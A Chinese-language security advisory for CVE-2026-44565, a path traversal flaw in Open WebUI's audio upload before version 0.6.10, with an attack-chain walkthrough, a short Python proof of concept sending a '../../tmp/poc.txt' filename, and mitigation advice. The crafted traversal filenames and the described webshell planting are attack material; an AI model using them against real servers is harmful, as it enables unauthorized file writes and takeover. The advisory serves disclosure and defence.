CVE-2026-44565 CVSS 8.1 高危

CVE-2026-44565 Open WebUI路径遍历漏洞

披露日期: 2026-05-15

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-44565

漏洞类型

路径遍历

CVSS评分

8.1 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Open WebUI

漏洞概述

Open WebUI是一款自托管的人工智能平台。在其0.6.10之前的版本中存在一处路径遍历漏洞。攻击者在上传音频文件时，可以利用系统未对文件名进行严格验证的缺陷，构造包含路径遍历字符（如../）的文件名。该漏洞允许低权限用户将文件写入服务器预期上传目录之外的任意位置，只要Web服务进程拥有相应权限即可执行写入操作，进而可能导致系统被完全控制或服务中断。

技术细节

该漏洞源于Open WebUI处理音频上传请求时的逻辑缺陷。当用户发起HTTP POST请求上传音频文件时，服务器后端直接从请求中提取原始文件名，并直接使用该文件名在文件系统上保存文件，而未对文件名中的特殊字符（如"../"）进行过滤、转义或规范化处理。攻击者可以通过拦截并修改上传请求中的filename字段，插入相对路径序列（例如"../../var/www/html/malicious.php"）。由于服务器端未实施路径安全检查，文件将被保存到攻击者指定的任意路径中。结合Web服务器运行用户通常拥有的写入权限，攻击者可能覆盖关键系统配置文件（如SSH配置）、上传WebShell后门或写入恶意脚本，从而在目标服务器上获得执行任意代码的能力，严重威胁系统的完整性和可用性。

攻击链分析

STEP 1

侦察与认证

攻击者发现目标Open WebUI实例，并注册或登录获取低权限用户账户。

STEP 2

构造Payload

攻击者准备一个音频文件（或任意文件），并将文件名修改为包含路径遍历序列的字符串，如'../../var/www/html/shell.php'。

STEP 3

发送恶意请求

攻击者使用工具（如Burp Suite或Python脚本）向音频上传接口发送POST请求，在filename字段注入构造好的恶意路径。

STEP 4

文件写入

服务器端未过滤文件名，直接将文件保存至攻击者指定的路径，成功实现任意文件写入。

STEP 5

后续利用

如果写入的是WebShell，攻击者可访问该脚本执行系统命令；如果写入的是配置文件，可篡改系统设置。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target URL for audio upload
target_url = "http://<target-ip>/api/v1/audio/upload"

# Malicious file with path traversal in filename
# The filename attempts to write to /tmp/poc.txt
files = {
    'file': ('../../tmp/poc.txt', b'VULNERABLE_FILE_CONTENT', 'audio/mpeg')
}

# Headers (Authorization might be needed based on config)
headers = {
    # 'Authorization': 'Bearer <valid_token>'
}

try:
    response = requests.post(target_url, files=files, headers=headers)
    print(f"Status Code: {response.status_code}")
    print(f"Response Body: {response.text}")
    
    if response.status_code == 200:
        print("[+] Potential exploitation successful. Check target filesystem.")
    else:
        print("[-] Exploitation failed or endpoint changed.")
except Exception as e:
    print(f"Error: {e}")

影响范围

Open WebUI < 0.6.10

防御指南

临时缓解措施

在无法立即升级的情况下，建议在WAF（Web应用防火墙）或反向代理层面配置规则，拦截所有包含路径遍历字符（如 '../', '..\'）的HTTP请求。此外，应检查服务器文件系统权限，确保Web服务进程（如nginx、apache用户）对非业务必需目录（如系统配置目录、Web根目录）没有写入权限，防止攻击者覆盖关键文件。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表